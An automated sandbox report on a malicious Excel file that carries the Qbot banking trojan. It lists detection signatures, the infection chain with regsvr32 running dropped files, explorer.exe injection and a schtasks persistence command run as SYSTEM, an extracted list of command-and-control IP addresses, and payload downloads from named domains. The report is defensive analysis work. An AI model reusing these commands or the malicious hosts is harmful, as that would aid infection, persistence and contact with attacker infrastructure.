Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls

Overview

General Information

Sample Name:SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls
Analysis ID:493727
MD5:7b83b99dace5664b9ab5c0c3882be408
SHA1:4c4893beca92234c023ee2dfff759e155c643ed3
SHA256:e005a59b0ab458c8a1ab6883e17504382bd72d2e9de8eb99c785de520c258c0c
Tags:xlsx
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Qbot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Qbot
Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Regsvr32 Command Line Without DLL
Machine Learning detection for dropped file
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 5340 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 7012 cmdline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 6932 cmdline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test MD5: 426E7499F6A7346F0410DEAD0805586B)
      • explorer.exe (PID: 6888 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
        • schtasks.exe (PID: 3016 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtwplfwnel /tr 'regsvr32.exe -s \'C:\Datop\test1.test\'' /SC ONCE /Z /ST 23:48 /ET 24:00 MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • regsvr32.exe (PID: 5528 cmdline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.test MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

Threatname: Qbot

{"Bot id": "tr", "Campaign": "1632817399", "Version": "402.363", "C2 list": ["105.198.236.99:443", "140.82.49.12:443", "37.210.152.224:995", "89.101.97.139:443", "81.241.252.59:2078", "27.223.92.142:995", "81.250.153.227:2222", "73.151.236.31:443", "47.22.148.6:443", "122.11.220.212:2222", "120.151.47.189:443", "199.27.127.129:443", "216.201.162.158:443", "136.232.34.70:443", "76.25.142.196:443", "181.118.183.94:443", "120.150.218.241:995", "185.250.148.74:443", "95.77.223.148:443", "75.66.88.33:443", "45.46.53.140:2222", "173.25.166.81:443", "103.148.120.144:443", "173.21.10.71:2222", "186.18.205.199:995", "71.74.12.34:443", "67.165.206.193:993", "47.40.196.233:2222", "68.204.7.158:443", "47.40.196.233:2222", "24.229.150.54:995", "109.12.111.14:443", "177.130.82.197:2222", "72.252.201.69:443", "24.55.112.61:443", "24.139.72.117:443", "187.156.138.172:443", "71.80.168.245:443", "105.157.55.133:995", "82.77.137.101:995", "173.234.155.233:443", "75.188.35.168:443", "5.238.149.235:61202", "73.77.87.137:443", "182.176.112.182:443", "96.37.113.36:993", "162.244.227.34:443", "92.59.35.196:2222", "196.218.227.241:995", "68.207.102.78:443", "2.188.27.77:443", "189.210.115.207:443", "181.163.96.53:443", "75.107.26.196:465", "185.250.148.74:2222", "68.186.192.69:443"]}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Exploit.Siggen3.20906.5188.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x3a8aa:$s1: Excel
  • 0x3b94a:$s1: Excel
  • 0x34cf:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
SecuriteInfo.com.Exploit.Siggen3.20906.5188.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
      00000009.00000003.380505097.0000000003320000.00000040.00000001.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        9.3.regsvr32.exe.33330bf.0.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
          9.2.regsvr32.exe.10000000.0.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
            17.2.explorer.exe.af0000.0.raw.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
              17.2.explorer.exe.af0000.0.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                9.3.regsvr32.exe.33330bf.0.raw.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security

                  Sigma Overview

                  System Summary:

                  barindex
                  Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                  Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, CommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5340, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, ProcessId: 7012
                  Sigma detected: Regsvr32 Command Line Without DLLShow sources
                  Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\explorer.exe, NewProcessName: C:\Windows\SysWOW64\explorer.exe, OriginalFileName: C:\Windows\SysWOW64\explorer.exe, ParentCommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 6932, ProcessCommandLine: C:\Windows\SysWOW64\explorer.exe, ProcessId: 6888

                  Persistence and Installation Behavior:

                  barindex
                  Sigma detected: Schedule system processShow sources
                  Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtwplfwnel /tr 'regsvr32.exe -s \'C:\Datop\test1.test\'' /SC ONCE /Z /ST 23:48 /ET 24:00, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtwplfwnel /tr 'regsvr32.exe -s \'C:\Datop\test1.test\'' /SC ONCE /Z /ST 23:48 /ET 24:00, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 6888, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtwplfwnel /tr 'regsvr32.exe -s \'C:\Datop\test1.test\'' /SC ONCE /Z /ST 23:48 /ET 24:00, ProcessId: 3016

                  Jbx Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Found malware configurationShow sources
                  Source: 17.2.explorer.exe.af0000.0.unpackMalware Configuration Extractor: Qbot {"Bot id": "tr", "Campaign": "1632817399", "Version": "402.363", "C2 list": ["105.198.236.99:443", "140.82.49.12:443", "37.210.152.224:995", "89.101.97.139:443", "81.241.252.59:2078", "27.223.92.142:995", "81.250.153.227:2222", "73.151.236.31:443", "47.22.148.6:443", "122.11.220.212:2222", "120.151.47.189:443", "199.27.127.129:443", "216.201.162.158:443", "136.232.34.70:443", "76.25.142.196:443", "181.118.183.94:443", "120.150.218.241:995", "185.250.148.74:443", "95.77.223.148:443", "75.66.88.33:443", "45.46.53.140:2222", "173.25.166.81:443", "103.148.120.144:443", "173.21.10.71:2222", "186.18.205.199:995", "71.74.12.34:443", "67.165.206.193:993", "47.40.196.233:2222", "68.204.7.158:443", "47.40.196.233:2222", "24.229.150.54:995", "109.12.111.14:443", "177.130.82.197:2222", "72.252.201.69:443", "24.55.112.61:443", "24.139.72.117:443", "187.156.138.172:443", "71.80.168.245:443", "105.157.55.133:995", "82.77.137.101:995", "173.234.155.233:443", "75.188.35.168:443", "5.238.149.235:61202", "73.77.87.137:443", "182.176.112.182:443", "96.37.113.36:993", "162.244.227.34:443", "92.59.35.196:2222", "196.218.227.241:995", "68.207.102.78:443", "2.188.27.77:443", "189.210.115.207:443", "181.163.96.53:443", "75.107.26.196:465", "185.250.148.74:2222", "68.186.192.69:443"]}
                  Multi AV Scanner detection for submitted fileShow sources
                  Source: SecuriteInfo.com.Exploit.Siggen3.20906.5188.xlsVirustotal: Detection: 15%Perma Link
                  Source: SecuriteInfo.com.Exploit.Siggen3.20906.5188.xlsReversingLabs: Detection: 22%
                  Machine Learning detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\key[1].gifJoe Sandbox ML: detected
                  Source: C:\Datop\test1.testJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 199.79.63.251:443 -> 192.168.2.3:49724 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 162.251.80.22:443 -> 192.168.2.3:49738 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 162.222.225.250:443 -> 192.168.2.3:49752 version: TLS 1.2
                  Source: Binary string: amstream.pdb source: explorer.exe, 00000011.00000003.389173855.0000000004BA1000.00000004.00000001.sdmp
                  Source: Binary string: c:\Bed\gone\91\Receive\Strai\what.pdb source: explorer.exe, 00000011.00000003.389474880.0000000004BA1000.00000004.00000001.sdmp, key[1].gif.0.dr
                  Source: Binary string: amstream.pdbGCTL source: explorer.exe, 00000011.00000003.389173855.0000000004BA1000.00000004.00000001.sdmp
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1000AEF6 FindFirstFileW,FindNextFileW,9_2_1000AEF6
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00AFAEF6 FindFirstFileW,FindNextFileW,17_2_00AFAEF6

                  Software Vulnerabilities:

                  barindex
                  Document exploit detected (drops PE files)Show sources
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: key[1].gif.0.drJump to dropped file
                  Document exploit detected (process start blacklist hit)Show sources
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
                  Document exploit detected (UrlDownloadToFile)Show sources
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
                  Source: global trafficDNS query: name: gillcart.com
                  Source: global trafficTCP traffic: 192.168.2.3:49724 -> 199.79.63.251:443
                  Source: global trafficTCP traffic: 192.168.2.3:49724 -> 199.79.63.251:443
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: Joe Sandbox ViewIP Address: 199.79.63.251 199.79.63.251
                  Source: Joe Sandbox ViewIP Address: 162.251.80.22 162.251.80.22
                  Source: Joe Sandbox ViewIP Address: 162.222.225.250 162.222.225.250
                  Source: global trafficHTTP traffic detected: GET /Cdpmoyhr/key.xml HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gillcart.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /MeOlE9Xxd/key.xml HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: geit.inConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /9DPZqAfZdq5z/key.xml HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: mercanets.comConnection: Keep-Alive
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 29 Sep 2021 21:45:38 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html;charset=utf-8
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://api.aadrm.com/
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://api.cortana.ai
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://api.diagnostics.office.com
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://api.microsoftstream.com/api/
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://api.office.net
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://api.onedrive.com
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://apis.live.net/v5.0/
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://augloop.office.com
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://augloop.office.com/v2
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://augloop.office.com;https://augloop-gcc.office.com;https://augloop.gov.online.office365.us;ht
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://cdn.entity.
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://clients.config.office.net/
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://config.edge.skype.com
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://cortana.ai
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://cortana.ai/api
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://cr.office.com
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://dataservice.o365filtering.com
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://dataservice.o365filtering.com/
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://dev.cortana.ai
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://devnull.onenote.com
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://directory.services.
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://enrichment.osi.office.net/
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://graph.ppe.windows.net
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://graph.ppe.windows.net/
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://graph.windows.net
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://graph.windows.net/
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://incidents.diagnostics.office.com
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://lifecycle.office.com
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://login.microsoftonline.com/
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
